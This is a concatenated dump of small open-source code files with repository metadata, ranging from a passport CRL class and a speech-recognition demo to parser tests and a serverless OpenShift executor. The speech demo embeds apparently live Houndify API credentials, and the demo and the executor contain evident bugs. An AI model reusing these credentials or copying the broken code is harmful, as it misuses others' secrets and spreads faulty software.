dadcb98c933ba30f86807ce7fd3fbfa6b2ab04f4
2,255
py
Python
tools/libs/PassID-Server/src/pymrtd/pki/crl.py
lukapercic/PassID-Public-Docs
4ae305af837231c4bf7ba94154c5bc29d2873fe9
[ "MIT" ]
1
2022-01-06T11:28:03.000Z
2022-01-06T11:28:03.000Z
tools/libs/PassID-Server/src/pymrtd/pki/crl.py
lukapercic/PassID-Public-Docs
4ae305af837231c4bf7ba94154c5bc29d2873fe9
[ "MIT" ]
1
2021-01-08T17:32:08.000Z
2021-01-08T17:32:08.000Z
tools/libs/PassID-Server/src/pymrtd/pki/crl.py
lukapercic/PassID-Public-Docs
4ae305af837231c4bf7ba94154c5bc29d2873fe9
[ "MIT" ]
2
2020-12-18T22:47:09.000Z
2020-12-18T22:48:57.000Z
''' File name: crl.py Author: ZeroPass - Nejc Skerjanc License: MIT lincense Python Version: 3.6 ''' from .x509 import CscaCertificate from .cert_utils import verify_sig from asn1crypto.crl import CertificateList import datetime """ CRL: \ -object *** -serial Number*** -subject key //not -authority key (CSCA - foreign key) *** -countrKey *** -start, end valid *** -signature algorithm string** -signature hash algorithm string** -SHA256 hash over whole object string or bytes """ class CertificateRevocationListError(Exception): pass class CertificateRevocationList(CertificateList): """Class; object that stores Certificate Revocation List (CRL) and has supporting functions """ @property def issuerCountry(self) -> str: """Function returns country of CRL issuer""" country = self.issuer.native['country_name'] return country @property def size(self) -> int: """Function returns size of CRL""" size = len(self['tbs_cert_list']['revoked_certificates']) return size @property def thisUpdate(self) -> datetime: """Returns the date when this CRL was issued""" this_update = self['tbs_cert_list']['this_update'].native return this_update @property def nextUpdate(self) -> datetime: """Returns the date of next CRL issuance""" next_update = self['tbs_cert_list']['next_update'].native return next_update @property def signatureAlgorithm(self) -> str: """It returns signature algorithm""" sig_algo = self['signature_algorithm'].signature_algo return sig_algo @property def signatureHashAlgorithm(self) -> str: """It returns hash of signature algorithm""" hash_algo = self['signature_algorithm'].hash_algo return hash_algo @property def fingerprint(self) -> str: """SHA256 hash over this CRL object""" fp = self.sha256.hex() return fp def verify(self, issuer: CscaCertificate): """ Function verifies if crl is signed by provided issuer CSCA """ verify_sig(issuer, self['tbs_cert_list'].dump(), self['signature'], self['signature_algorithm'])
28.544304
104
0.654102
255
2,255
5.67451
0.411765
0.053214
0.030408
0.041465
0.064962
0
0
0
0
0
0
0.008731
0.238137
2,255
78
105
28.910256
0.833527
0.218625
0
0.189189
0
0
0.122507
0
0
0
0
0
0
1
0.216216
false
0.027027
0.108108
0
0.567568
0.027027
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
daeb71ef71ffac61a566af31cde51e40b5ffba23
2,173
py
Python
pythonPrograms/microphone_recognition.py
akierson/capstone-prototype
a7d5754653f8c64d17ba21fbe4801c316a95b318
[ "MIT" ]
null
null
null
pythonPrograms/microphone_recognition.py
akierson/capstone-prototype
a7d5754653f8c64d17ba21fbe4801c316a95b318
[ "MIT" ]
null
null
null
pythonPrograms/microphone_recognition.py
akierson/capstone-prototype
a7d5754653f8c64d17ba21fbe4801c316a95b318
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # NOTE: this example requires PyAudio because it uses the Microphone class import speech_recognition as sr # obtain audio from the microphone r = sr.Recognizer() with sr.Microphone() as source: print("Say something!") audio = r.listen(source) # recognize speech using Sphinx try: print("Sphinx thinks you said " + r.recognize_sphinx(audio)) except sr.UnknownValueError: print("Sphinx could not understand audio") except sr.RequestError as e: print("Sphinx error; {0}".format(e)) # recognize speech using Google Speech Recognition try: # for testing purposes, we're just using the default API key # to use another API key, use `r.recognize_google(audio, key="GOOGLE_SPEECH_RECOGNITION_API_KEY")` # instead of `r.recognize_google(audio)` print("Google Speech Recognition thinks you said " + r.recognize_google(audio)) except sr.UnknownValueError: print("Google Speech Recognition could not understand audio") except sr.RequestError as e: print("Could not request results from Google Speech Recognition service; {0}".format(e)) # recognize speech using Google Cloud Speech GOOGLE_CLOUD_SPEECH_CREDENTIALS = try: print("Google Cloud Speech thinks you said " + r.recognize_google_cloud(audio, credentials_json=GOOGLE_CLOUD_SPEECH_CREDENTIALS)) except sr.UnknownValueError: print("Google Cloud Speech could not understand audio") except sr.RequestError as e: print("Could not request results from Google Cloud Speech service; {0}".format(e)) # recognize speech using Houndify # Has free level for 12 things/day HOUNDIFY_CLIENT_ID = "KVXJVsAp-z_JAZlxwKHq_g==" # Houndify client IDs are Base64-encoded strings HOUNDIFY_CLIENT_KEY = "zUmSQKKcHAn_VEd8LsPnpUluwK5Db9YMblgDicyPm5yD7tp20WswAHDTKb1LsAHHL2laMDmzgyDVBkQNX-AKEg==" # Houndify client keys are Base64-encoded strings try: print("Houndify thinks you said " + r.recognize_houndify(audio, client_id=HOUNDIFY_CLIENT_ID, client_key=HOUNDIFY_CLIENT_KEY)) except sr.UnknownValueError: print("Houndify could not understand audio") 
except sr.RequestError as e: print("Could not request results from Houndify service; {0}".format(e))
42.607843
163
0.774045
295
2,173
5.59322
0.308475
0.038788
0.047273
0.033939
0.375758
0.28
0.244848
0.178182
0.178182
0.178182
0
0.01073
0.1422
2,173
50
164
43.46
0.874464
0.277957
0
0.375
0
0
0.397815
0.071979
0
0
0
0
0
0
null
null
0
0.03125
null
null
0.40625
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
1
0
2
daf9942d2334651ad722f813433f661721b44f8b
2,300
py
Python
src/test/tinc/tincrepo/mpp/gpdb/tests/storage/access_methods/ao_memory.py
lintzc/GPDB
b48c8b97da18f495c10065d0853db87960aebae2
[ "PostgreSQL", "Apache-2.0" ]
1
2017-09-15T06:09:56.000Z
2017-09-15T06:09:56.000Z
src/test/tinc/tincrepo/mpp/gpdb/tests/storage/access_methods/ao_memory.py
guofengrichard/gpdb
29bdd6ef38d8d9b9cb04ca31d44e279eb9f640d3
[ "PostgreSQL", "Apache-2.0" ]
null
null
null
src/test/tinc/tincrepo/mpp/gpdb/tests/storage/access_methods/ao_memory.py
guofengrichard/gpdb
29bdd6ef38d8d9b9cb04ca31d44e279eb9f640d3
[ "PostgreSQL", "Apache-2.0" ]
1
2018-12-04T09:13:57.000Z
2018-12-04T09:13:57.000Z
#!/usr/bin/env python """ Copyright (C) 2004-2015 Pivotal Software, Inc. All rights reserved. This program and the accompanying materials are made available under the terms of the under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from gppylib.commands.base import Command from tinctest import logger from mpp.lib.PSQL import PSQL from mpp.models import MPPTestCase import os import re import socket import time import shutil import sys import signal class aoreadmemory(MPPTestCase): def tearDown(self): gpfaultinjector = Command('fault injector', 'source $GPHOME/greenplum_path.sh; ' 'gpfaultinjector -f malloc_failure ' '-y reset -H ALL -r primary') gpfaultinjector.run() def test_ao_malloc_failure(self): """ @product_version gpdb: [4.3.5.1 -] """ PSQL.run_sql_command('DROP table if exists ao_read_malloc') PSQL.run_sql_command('create table ao_read_malloc (a int) with (appendonly=true, compresstype=quicklz)') PSQL.run_sql_command('insert into ao_read_malloc ' 'select * from generate_series(1, 1000)') gpfaultinjector = Command('fault injector', 'source $GPHOME/greenplum_path.sh; ' 'gpfaultinjector -f malloc_failure ' '-y error -H ALL -r primary') gpfaultinjector.run() res ={'rc':0, 'stdout':'', 'stderr':''} PSQL.run_sql_command(sql_cmd='select count(*) from ao_read_malloc', results=res) logger.info(res) self.assertTrue("ERROR: fault triggered" in res['stderr']) self.assertFalse("ERROR: could not temporarily connect to one or more segments" in res['stderr']) logger.info('Pass')
34.848485
112
0.662609
299
2,300
5.010033
0.551839
0.040053
0.026702
0.045394
0.162884
0.162884
0.12283
0.12283
0.12283
0.12283
0
0.012761
0.250435
2,300
65
113
35.384615
0.856148
0.008696
0
0.235294
0
0
0.352295
0.047188
0
0
0
0
0.058824
0
null
null
0.029412
0.323529
null
null
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
1
0
0
0
0
2
971097828072775e23da859896c3b27a12ba0f10
866
py
Python
setup.py
emanuil-tolev/fundfind
95cc4b30efc6a3dc73142d82ea32c8fd8ca74029
[ "MIT" ]
null
null
null
setup.py
emanuil-tolev/fundfind
95cc4b30efc6a3dc73142d82ea32c8fd8ca74029
[ "MIT" ]
null
null
null
setup.py
emanuil-tolev/fundfind
95cc4b30efc6a3dc73142d82ea32c8fd8ca74029
[ "MIT" ]
null
null
null
from setuptools import setup, find_packages setup( name = 'fundfind', version = '0.1', packages = find_packages(), url = 'http://fundfind.cottagelabs.com', author = 'Emanuil Tolev', author_email = 'emanuil.tolev@gmail.com', description = 'fundfind - an Open way to share, visualise and map out scholarly funding opportunities', license = 'MIT', # TODO look for other potentially useful classifiers classifiers = [ 'Development Status :: 3 - Alpha', 'License :: OSI Approved :: MIT License', 'Operating System :: OS Independent', 'Programming Language :: Python', ], install_requires = [ 'werkzeug==0.8.3', 'Flask==0.9', 'Flask-Login==0.1.3', 'Flask-WTF==0.8.2', 'pyes==0.16', 'requests==1.1.0', 'parsedatetime==0.8.7', ], )
28.866667
107
0.58545
99
866
5.080808
0.69697
0.011928
0
0
0
0
0
0
0
0
0
0.036278
0.267898
866
29
108
29.862069
0.757098
0.057737
0
0.076923
0
0
0.496925
0.02829
0
0
0
0.034483
0
1
0
true
0
0.038462
0
0.038462
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
1
0
0
0
0
0
0
2
971279e27cb8fe7a2ddcfa304bd094cf6b9e8fdb
2,423
py
Python
Logger.py
amgc500/MCNTE
dae1a7b90bb7b338438eb470db9f1787999d9186
[ "MIT" ]
null
null
null
Logger.py
amgc500/MCNTE
dae1a7b90bb7b338438eb470db9f1787999d9186
[ "MIT" ]
null
null
null
Logger.py
amgc500/MCNTE
dae1a7b90bb7b338438eb470db9f1787999d9186
[ "MIT" ]
null
null
null
"""Implement a logging system. This class will direct output to both the screen and a specified file. Code for the article "Monte Carlo Methods for the Neutron Transport Equation. By A. Cox, A. Kyprianou, S. Harris, M. Wang. Thi sfile contains the code to produce the plots in the case of the 2D version of the NTE. MIT License Copyright (c) Alexander Cox, 2020. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import sys import os from pathlib import Path class Logger(object): """Send output to file and screen. Based on an answer here: https://stackoverflow.com/questions/14906764/how-to-redirect-stdout-to-both-file-and-console-with-scripting """ def __init__(self): self.terminal = sys.stdout log_dir = os.getcwd()+'/output' Path(log_dir).mkdir(parents=True, exist_ok=True) self.log = open(log_dir+"/logfile.log", "a") def write(self, message): """Send message to screen and file.""" self.terminal.write(message) self.log.write(message) def close(self): """Close open filestream. 
Revert to screen only output.""" self.log.close() sys.stdout = self.terminal def flush(self): """Not sure if needed.""" # this flush method is needed for python 3 compatibility. # this handles the flush command by doing nothing. # you might want to specify some extra behavior here. pass
35.115942
115
0.723896
364
2,423
4.796703
0.53022
0.050401
0.014891
0
0
0
0
0
0
0
0
0.007273
0.20553
2,423
68
116
35.632353
0.89974
0.752373
0
0
0
0
0.035842
0
0
0
0
0
0
1
0.235294
false
0.058824
0.176471
0
0.470588
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
1
0
0
0
0
0
2
9721ef07918231ab859cd2bc6178d6541bbf6879
171
py
Python
eln/decorators/register_reader.py
lehvitus/eln
b78362af20cacffe076bf3dbfd27dcc090e43e39
[ "BSD-3-Clause" ]
2
2020-02-05T04:00:32.000Z
2020-03-18T02:12:33.000Z
eln/decorators/register_reader.py
oleoneto/eln
b78362af20cacffe076bf3dbfd27dcc090e43e39
[ "BSD-3-Clause" ]
1
2020-03-18T02:36:04.000Z
2020-03-18T02:36:04.000Z
eln/decorators/register_reader.py
oleoneto/eln
b78362af20cacffe076bf3dbfd27dcc090e43e39
[ "BSD-3-Clause" ]
null
null
null
# eln:decorators READERS = dict() # Decorator for adding reader functions def register_reader(function): READERS[function.__name__] = function return function
15.545455
41
0.748538
19
171
6.473684
0.736842
0
0
0
0
0
0
0
0
0
0
0
0.175439
171
10
42
17.1
0.87234
0.304094
0
0
0
0
0
0
0
0
0
0
0
1
0.25
false
0
0
0
0.5
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
2
972cb511c9c5f56f2bd7197d4176ab7ff15fc5f5
1,012
py
Python
lib/oci_utils/migrate/exception.py
totalamateurhour/oci-utils
b3e8348f66f8a26453fab0f3b616b3c1585468a7
[ "UPL-1.0" ]
35
2019-04-21T00:58:30.000Z
2022-01-28T15:22:41.000Z
lib/oci_utils/migrate/exception.py
totalamateurhour/oci-utils
b3e8348f66f8a26453fab0f3b616b3c1585468a7
[ "UPL-1.0" ]
43
2019-05-19T20:13:41.000Z
2022-03-31T17:39:25.000Z
lib/oci_utils/migrate/exception.py
totalamateurhour/oci-utils
b3e8348f66f8a26453fab0f3b616b3c1585468a7
[ "UPL-1.0" ]
23
2019-04-10T12:48:00.000Z
2022-03-25T16:57:47.000Z
# oci-utils # # Copyright (c) 2019, 2020 Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown # at http://oss.oracle.com/licenses/upl. """ Module with oci migrate related exceptions. """ class OciMigrateException(Exception): """ Exceptions for the Image Migrate to OCI context. """ __args = None def __init__(self, message=None): """ Initialisation of the Oci Migrate Exception. Parameters ---------- message: str The exception message. """ self._message = message assert (self._message is not None), 'No exception message given' if self._message is None: self._message = 'An exception occurred, no further information' def __str__(self): """ Get this OciMigrateException representation. Returns ------- str The error message. """ return str(self._message)
24.682927
77
0.603755
110
1,012
5.418182
0.627273
0.110738
0.043624
0
0
0
0
0
0
0
0
0.014085
0.298419
1,012
40
78
25.3
0.825352
0.477273
0
0
0
0
0.177057
0
0
0
0
0
0.111111
1
0.222222
false
0
0
0
0.555556
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
973cc92d02ecaec218f328cfa03f67962ce46109
857
py
Python
smart_match/monge_elkan.py
wujinglin226/smart-match
aa84f9e4dda89aadc23f439f33d20269e2674b0a
[ "MIT" ]
1
2020-09-28T13:14:31.000Z
2020-09-28T13:14:31.000Z
smart_match/monge_elkan.py
yuqiangfeng96/smart-match
86a485b569c31d081b3f165aac9532f595d3deec
[ "MIT" ]
null
null
null
smart_match/monge_elkan.py
yuqiangfeng96/smart-match
86a485b569c31d081b3f165aac9532f595d3deec
[ "MIT" ]
null
null
null
import smart_match from math import sqrt class MongeElkan: def __init__(self, method=None): self.method = smart_match.get_method(method) def similarity(self, X, Y): if not X and not Y: return 1 if not X or not Y: return 0 return sqrt(self.monge_elkan(X, Y) * self.monge_elkan(Y, X)) def monge_elkan(self, s, t): sum_score = 0 for x in s: max_score = 0 for y in t: max_score = max(max_score, self.method.similarity(x, y)) sum_score += max_score return sum_score / len(s) def dissimilarity(self, s, t): return 1 - self.similarity(s, t) def __repr__(self): return f'MongeElkan [method={self.method}]'
24.485714
72
0.514586
113
857
3.716814
0.327434
0.095238
0.028571
0
0
0
0
0
0
0
0
0.009728
0.400233
857
35
73
24.485714
0.807393
0
0
0
0
0
0.038462
0.025641
0
0
0
0
0
1
0.217391
false
0
0.086957
0.086957
0.608696
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
97463ce31028569c4e360e76832abc2a9f99d118
3,957
py
Python
tests/test_parser.py
MacarielAerial/networkx-query
07d9d4a5ff1f2db55a62a490458c5461dad057bb
[ "MIT" ]
8
2020-05-02T00:14:19.000Z
2021-11-16T19:27:37.000Z
tests/test_parser.py
MacarielAerial/networkx-query
07d9d4a5ff1f2db55a62a490458c5461dad057bb
[ "MIT" ]
null
null
null
tests/test_parser.py
MacarielAerial/networkx-query
07d9d4a5ff1f2db55a62a490458c5461dad057bb
[ "MIT" ]
1
2021-03-31T08:30:13.000Z
2021-03-31T08:30:13.000Z
import pytest from networkx_query import ParserException from networkx_query.parser import compile_ast, explain, parse node_0 = {'application': 'test'} node_1 = {'application': 'test', 'weight': 3, 'group': 'my-group'} node_2 = {'_link': {'provider': "aws", 'resource_type': "test", 'other': {'weight': 2}}} def test_explain(): result = explain(parse({'not': {'has': ['group']}, 'has': 'application', 'eq': [('_link', 'other', 'weight'), 2]})) assert result == { 'and': [{'not': [{'has': ['group']}]}, {'has': ['application']}, {'eq': [('_link', 'other', 'weight'), 2]}] } def test_compile_expression_has(): func = compile_ast(parse({'has': 'application'})) assert func(node_0) assert func(node_1) def test_compile_expression_not_has(): func = compile_ast(parse({'not': {'has': 'group'}})) assert func(node_0) assert not func(node_1) def test_compile_expression_contains(): func = compile_ast(parse({'contains': ['group', 'my']})) assert not func(node_0) assert func(node_1) def test_compile_expression_has_dict(): func = compile_ast(parse({'has': '_link'})) assert not func(node_0) assert func(node_2) def test_compile_expression_has_path(): func = compile_ast(parse({'has': [('_link', 'other', 'weight')]})) assert not func(node_0) assert func(node_2) def test_compile_expression_eq_path(): func = compile_ast(parse({'eq': [('_link', 'other', 'weight'), 2]})) assert func(node_2) def test_compile_expression_neq_path(): func = compile_ast(parse({'neq': [('_link', 'other', 'weight'), 2]})) assert not func(node_2) func = compile_ast(parse({'neq': [('_link', 'other', 'weight'), 8]})) assert func(node_2) def test_compile_expression_gt_path(): func = compile_ast(parse({'gt': [('_link', 'other', 'weight'), 1]})) assert func(node_2) func = compile_ast(parse({'gt': [('_link', 'other', 'weight'), 2]})) assert not func(node_2) def test_compile_expression_gte_path(): func = compile_ast(parse({'gte': [('_link', 'other', 'weight'), 2]})) assert func(node_2) func = compile_ast(parse({'gte': 
[('_link', 'other', 'weight'), 1]})) assert func(node_2) def test_compile_expression_lte_path(): func = compile_ast(parse({'lte': [('_link', 'other', 'weight'), 2]})) assert func(node_2) func = compile_ast(parse({'lte': [('_link', 'other', 'weight'), 3]})) assert func(node_2) def test_compile_expression_lt_path(): func = compile_ast(parse({'lt': [('_link', 'other', 'weight'), 3]})) assert func(node_2) func = compile_ast(parse({'lt': [('_link', 'other', 'weight'), 2]})) assert not func(node_2) def test_compile_expression_in_path(): func = compile_ast(parse({'in': [('_link', 'other', 'weight'), [1, 2, 3]]})) assert func(node_2) def test_compile_expression_and(): func = compile_ast(parse({'and': [{'has': 'application'}, {'in': [('weight',), [1, 2, 3]]}]})) assert not func(node_0) assert func(node_1) assert not func(node_2) def test_compile_expression_or(): func = compile_ast(parse({'or': [{'has': 'application'}, {'in': [('weight',), [1, 2, 3]]}]})) assert func(node_0) assert func(node_1) assert not func(node_2) def test_compile_expression_xor(): func = compile_ast(parse({'xor': [{'has': 'application'}, {'in': [('weight',), [1, 2, 3]]}]})) assert func(node_0) assert not func(node_1) assert not func(node_2) def test_compile_expression_nxor(): func = compile_ast(parse({'nxor': [{'has': 'application'}, {'in': [('weight',), [1, 2, 3]]}]})) assert not func(node_0) assert func(node_1) assert func(node_2) def test_parse_exception(): with pytest.raises(ParserException): parse({'has': ['_link', 'other', 'weight']}) def test_parse_raise_unknown_operator(): with pytest.raises(ParserException): parse({'idontexistatall': ['_link', 'other', 'weight']})
30.674419
119
0.62699
528
3,957
4.422348
0.106061
0.116488
0.12591
0.170878
0.783298
0.681799
0.643255
0.622698
0.440685
0.372591
0
0.020242
0.163508
3,957
128
120
30.914063
0.685196
0
0
0.409091
0
0
0.156937
0
0
0
0
0
0.397727
1
0.215909
false
0
0.034091
0
0.25
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
2
9748ebd3c81e9508be7de2eff6f2fc9edd532fd6
462
py
Python
src/apps/spam/views/__init__.py
SlonSky/django-grasped
97ea2f6d2e10232fc084a6407fa089df2cdf086e
[ "MIT" ]
null
null
null
src/apps/spam/views/__init__.py
SlonSky/django-grasped
97ea2f6d2e10232fc084a6407fa089df2cdf086e
[ "MIT" ]
null
null
null
src/apps/spam/views/__init__.py
SlonSky/django-grasped
97ea2f6d2e10232fc084a6407fa089df2cdf086e
[ "MIT" ]
null
null
null
""" This package represents Presentation layer. Put your views for different API. Your views should use services from Application layer, without implementing logic and only preparing given data from request for services and formatting it for response. All of sub-packages should use the same services interfaces, differentiating only be data presentation. Remember: your Presentation layer is Adapter of Request for Services and of Services for Response. """
28.875
54
0.816017
66
462
5.712121
0.606061
0.090186
0.095491
0.111406
0
0
0
0
0
0
0
0
0.151515
462
15
55
30.8
0.961735
0.980519
0
null
0
null
0
0
null
0
0
0
null
1
null
true
0
0
null
null
null
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
2
974c13a3ebcb86826ca3216faddaae29b8d46993
245
py
Python
archived/archive-WSPS/modify_global_att.py
XiaoxiongXie/WRF-SUEWS
51f8d2359b394016e65121f3baab908b1ad4d89c
[ "MIT" ]
2
2020-09-24T09:15:31.000Z
2020-09-28T16:16:30.000Z
archived/archive-WSPS/modify_global_att.py
XiaoxiongXie/WRF-SUEWS
51f8d2359b394016e65121f3baab908b1ad4d89c
[ "MIT" ]
3
2020-09-24T13:46:24.000Z
2020-10-01T09:54:17.000Z
archived/archive-WSPS/modify_global_att.py
XiaoxiongXie/WRF-SUEWS
51f8d2359b394016e65121f3baab908b1ad4d89c
[ "MIT" ]
2
2020-10-01T09:46:58.000Z
2022-01-09T10:38:21.000Z
#!/usr/bin/env python import netCDF4 as nc4 import os filename = os.path.join('/Users/zhenkunli/work/2018/WRFV3/run', 'wrfinput_d01') print 'Processing file %s...' % filename nc = nc4.Dataset(filename, 'a') nc.SF_SURFACE_PHYSICS = 9 nc.close()
24.5
79
0.726531
39
245
4.487179
0.820513
0
0
0
0
0
0
0
0
0
0
0.050459
0.110204
245
9
80
27.222222
0.752294
0.081633
0
0
0
0
0.3125
0.160714
0
0
0
0
0
0
null
null
0
0.285714
null
null
0.142857
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
2
976d30103ee0ad1012aff242e5d67605f2fb00a2
1,597
py
Python
midiio/containers.py
blowfeld/python-midi-io
8dd5c7fabc29bc407a6fb8987538c7a9dce68d94
[ "MIT" ]
1
2020-10-19T08:12:35.000Z
2020-10-19T08:12:35.000Z
midiio/containers.py
blowfeld/python-midi-io
8dd5c7fabc29bc407a6fb8987538c7a9dce68d94
[ "MIT" ]
3
2017-11-18T16:46:01.000Z
2021-11-20T22:55:38.000Z
midiio/containers.py
blowfeld/python-midi-io
8dd5c7fabc29bc407a6fb8987538c7a9dce68d94
[ "MIT" ]
null
null
null
from pprint import pformat class Pattern(object): def __init__(self, tracks=[], resolution=220, format=1): self._format = format self._resolution = resolution self._tracks = tuple(tracks) @property def format(self): return self._format @property def resolution(self): return self._resolution @property def tracks(self): return self._tracks def append(track): return Pattern(self._format, self.resolution, self._tracks + (track, )) def extend(tracks): return Pattern(self._format, self.resolution, self._tracks + tuple(tracks)) def __getitem__(self, key): return self._tracks[key] def __iter__(self): return iter(self._tracks) def __len__(self): return len(self._tracks) def __repr__(self): return "midiio.Pattern(format=%r, resolution=%r, tracks=\\\n%s)" % \ (self.format, self.resolution, pformat(list(self._tracks))) class Track(object): def __init__(self, events=[]): self._events = tuple(events) @property def events(self): return self._events def append(event): return Track(self._events + (event, )) def extend(events): return Track(self._events + tuple(events)) def __getitem__(self, key): return self._events[key] def __iter__(self): return iter(self._events) def __len__(self): return len(self._events) def __repr__(self): return "midiio.Track(\\\n %s)" % (pformat(list(self._events)).replace('\n', '\n '), )
24.953125
95
0.619912
186
1,597
4.989247
0.182796
0.107759
0.086207
0.077586
0.364224
0.269397
0.161638
0.101293
0
0
0
0.003353
0.252974
1,597
63
96
25.349206
0.774518
0
0
0.26087
0
0
0.051972
0.015654
0
0
0
0
0
1
0.391304
false
0
0.021739
0.347826
0.804348
0.021739
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
0
0
0
2
97b740717ca0bdeb0bb1cbe8a4771b0412e31734
503
py
Python
SET/difference.py
ragulkesavan/Python-75-Hackathon
adda961155467a428938fc52e2d761bf5b786788
[ "MIT" ]
null
null
null
SET/difference.py
ragulkesavan/Python-75-Hackathon
adda961155467a428938fc52e2d761bf5b786788
[ "MIT" ]
null
null
null
SET/difference.py
ragulkesavan/Python-75-Hackathon
adda961155467a428938fc52e2d761bf5b786788
[ "MIT" ]
null
null
null
phone=set(["mi","apple","samsung","giomee","jio","nokia","karbon"]) tv=set(["samsung","apple","onida","vediocon"]) brand=phone.difference(tv) print "brands in phone : ",phone print "brands in tv : ",tv print "phone brands that do not have tv : ",brand ''' OUTPUT: brands in phone : set(['apple', 'samsung', 'jio', 'nokia', 'mi', 'giomee', 'karbon']) brands in tv : set(['onida', 'vediocon', 'apple', 'samsung']) phone brands that do not have tv : set(['giomee', 'jio', 'nokia', 'mi', 'karbon']) '''
35.928571
86
0.626243
71
503
4.43662
0.309859
0.101587
0.088889
0.107937
0.165079
0.165079
0.165079
0
0
0
0
0
0.127237
503
13
87
38.692308
0.71754
0
0
0
0
0
0.5
0
0
0
0
0
0
0
null
null
0
0
null
null
0.5
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
1
0
2
97d1eed2070eaf000dcbdb4bf3fe9d744a01be14
1,255
py
Python
snafulib/executors/openshift.py
isabella232/snafu
91cc181f4073fa16d5be9ae6202342102f75d128
[ "Apache-2.0" ]
31
2017-04-22T07:16:08.000Z
2022-03-13T13:36:17.000Z
snafulib/executors/openshift.py
serviceprototypinglab/snafu
91cc181f4073fa16d5be9ae6202342102f75d128
[ "Apache-2.0" ]
1
2022-02-18T13:07:37.000Z
2022-02-18T13:07:37.000Z
snafulib/executors/openshift.py
isabella232/snafu
91cc181f4073fa16d5be9ae6202342102f75d128
[ "Apache-2.0" ]
7
2017-08-17T11:47:52.000Z
2022-02-18T11:51:03.000Z
# Snafu: Snake Functions - OpenShift Executor import requests import os import configparser import subprocess container = "jszhaw/snafu" endpoints = {} def executecontrol(flaskrequest, tenant): if not tenant in endpoints: username = os.getenv("OPENSHIFT_USERNAME") password = os.getenv("OPENSHIFT_PASSWORD") password = os.getenv("OPENSHIFT_PROJECT") if not username or not password or not project: return os.system("oc login https://console.appuio.ch/ --username={} --password={}".format(username, password)) os.system("oc project {}".format(project)) os.system("oc new-app --name snafu-{} jszhaw/snafu".format(tenant)) p = subprocess.run("oc status | grep svc/snafu-{} | cut -d " " -f 3".format(tenant), shell=True, stdout=subprocess.PIPE) endpoints[tenant] = "http://{}".format(p.decode("utf-8")) # FIXME: mounting the tenant's volume container to /opt/functions-local endpoint = endpoints[tenant] headers = {} headers["X-Amz-Date"] = flaskrequest.headers.get("X-Amz-Date") data = flaskrequest.data.decode("utf-8") #method=r.method -> requests.post reply = requests.post(endpoint + flaskrequest.path, data=data, headers=headers) if reply.status_code == 200: return reply.content.decode("utf-8") else: return
31.375
122
0.717131
167
1,255
5.365269
0.467066
0.026786
0.05692
0.055804
0
0
0
0
0
0
0
0.006422
0.131474
1,255
39
123
32.179487
0.815596
0.115538
0
0.074074
0
0
0.242315
0
0
0
0
0.025641
0
1
0.037037
false
0.148148
0.148148
0
0.296296
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
1
0
0
0
0
0
2
8af0066c9df56b9dfc441a1e4b4117631b55bd62
3,006
py
Python
tools/profiling/microbenchmarks/speedup.py
lalo/grpc
4865c79548d4f83ebae4e10fbaf4c3ba10535c97
[ "BSD-3-Clause" ]
null
null
null
tools/profiling/microbenchmarks/speedup.py
lalo/grpc
